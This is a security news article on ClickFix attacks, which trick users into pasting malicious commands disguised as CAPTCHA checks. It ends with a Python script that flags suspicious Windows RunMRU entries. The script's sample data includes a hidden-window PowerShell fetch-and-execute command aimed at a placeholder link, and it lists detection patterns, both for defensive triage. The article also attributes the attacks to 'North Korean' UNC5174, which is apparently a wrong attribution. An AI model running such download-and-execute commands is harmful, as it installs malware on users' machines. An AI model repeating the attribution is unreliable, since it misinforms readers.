Cross-platform vulnerability alert: Microsoft issues warning about joint attacks targeting Windows and macOS systems via ClickFix exploit
In the ever-evolving world of cybersecurity, a new threat has emerged that is causing concern among security experts worldwide. This threat is known as ClickFix, a social engineering technique that has been observed in attack campaigns since early 2024.
ClickFix is a cunning method used by attackers to disguise malicious commands as seemingly harmless tasks. One such task is CAPTCHA verification: the commands carry decoy text such as "Cloud-Identifier:XXXX" or "# Human, not robot: CAPTCHA: Verification ID: XXXX" so that the pasted text looks like part of a legitimate verification step.
The attackers' modus operandi often involves phishing, malvertising, or drive-by infections, often under the guise of well-known brands. For instance, the social engineering technique ClickFix has been used by the North Korean state-sponsored APT group UNC5174 against thousands of companies and end-user devices worldwide.
The ClickFix landing page, often spoofing a Discord server, uses the Discord logo image file to create an impression of legitimacy. Once a user clicks the "Verify" button on this fake landing page, a click handler registered in the page's script with "addEventListener" fires and copies the malicious command to the user's clipboard with "navigator.clipboard.writeText(command)".
Many of these payloads are "fileless", meaning they are not stored as classic executable files on the hard drive. This makes them harder to detect and remove.
Microsoft Defender XDR is said to provide protection across multiple stages of the ClickFix attack chain. However, the spread of ClickFix is rapid, and it is now being used daily in attack campaigns against thousands of corporate and end-user devices worldwide.
Malicious ClickFix commands are often PowerShell one-liners that use the aliases "iwr" (Invoke-WebRequest), "irm" (Invoke-RestMethod), and "iex" (Invoke-Expression) to download and execute a payload. The URLs inside these commands are often shortened using services like Bitly.
Attackers also exploit compromised websites to distribute the ClickFix landing page. Malvertising is another popular method used to direct users to ClickFix landing pages. One example of a phishing campaign using URLs and redirections was observed in June 2025, where the campaign posed as the US Social Security Administration and combined social engineering and domain spoofing to spread ScreenConnect.
In June 2025, a ClickFix campaign targeted macOS users to spread Atomic macOS Stealer (AMOS). Observed examples of malware in ClickFix attacks include infostealers such as Lumma Stealer, remote access trojans such as Xworm and AsyncRAT, loaders such as Latrodectus and MintsLoader, and rootkits based on modified open-source code such as r77.
Users are advised to be vigilant and to verify the authenticity of any requests for CAPTCHA verifications or other seemingly harmless tasks. Entering commands in the "Run" dialog leaves forensic traces, particularly in the "RunMRU" (Most Recently Used) registry key. Suspicious entries under this registry key may indicate a ClickFix attack.
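The following is an added example, not code from the original article or from Microsoft, showing how a responder might triage the RunMRU traces described above. It parses the key's value layout (an "MRUList" value giving most-recent-first order, and one value per entry ending in a "\1" suffix) and flags entries that contain the PowerShell download-and-execute aliases, hidden-window switches, URL shorteners, or the decoy "CAPTCHA" comments mentioned earlier. The sample registry values and the Bitly link in them are constructed for the example; the optional live read uses the standard-library winreg module and only runs on Windows.

```python
import re
import sys
from typing import Dict, List, Tuple

# Constructed sample of the values found under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Entry "b" imitates a ClickFix command; the URL is a placeholder, not a real link.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "cab",  # most recently used first: c, then a, then b
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr https://bit.ly/EXAMPLE-PLACEHOLDER | iex" '
         "# Human, not robot: CAPTCHA: Verification ID: 1234\\1",
    "c": "mstsc\\1",
}

# Indicators typical of ClickFix commands as described in the article.
INDICATORS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression)\b", re.I),
     "PowerShell download/execute alias"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(bit\.ly|tinyurl\.com|t\.co)\b", re.I), "URL shortener"),
    (re.compile(r"#\s*Human,?\s*not\s*robot|CAPTCHA|Cloud-Identifier", re.I), "ClickFix decoy comment"),
    (re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
]


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (value name, command) pairs in MRU order with the '\\1' suffix stripped."""
    order = values.get("MRUList") or "".join(sorted(k for k in values if k != "MRUList"))
    entries = []
    for name in order:
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((name, cmd))
    return entries


def score_command(cmd: str) -> List[str]:
    """Names of every indicator that matches the command."""
    return [label for pattern, label in INDICATORS if pattern.search(cmd)]


def find_clickfix_entries(values: Dict[str, str]) -> List[dict]:
    """Flag entries with a decoy comment or at least two other indicators."""
    hits = []
    for name, cmd in parse_runmru(values):
        indicators = score_command(cmd)
        if "ClickFix decoy comment" in indicators or len(indicators) >= 2:
            hits.append({"value": name, "command": cmd, "indicators": indicators})
    return hits


def read_runmru_from_registry() -> Dict[str, str]:
    """Read the live RunMRU key on Windows; returns {} elsewhere (winreg is Windows-only)."""
    if sys.platform != "win32":
        return {}
    import winreg  # standard library on Windows
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            values[name] = str(data)
            index += 1
    return values


if __name__ == "__main__":
    source = read_runmru_from_registry() or SAMPLE_RUNMRU
    for hit in find_clickfix_entries(source):
        print(f"[{hit['value']}] {hit['command']}")
        print("    indicators:", ", ".join(hit["indicators"]))
```

On a live Windows host the script reads the current user's key; elsewhere it falls back to the constructed sample so the detection logic can be exercised offline. The two-indicator threshold keeps ordinary "powershell" entries out of the results while still catching the combination of alias, hidden window and shortened URL that the article describes.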
Stay safe online!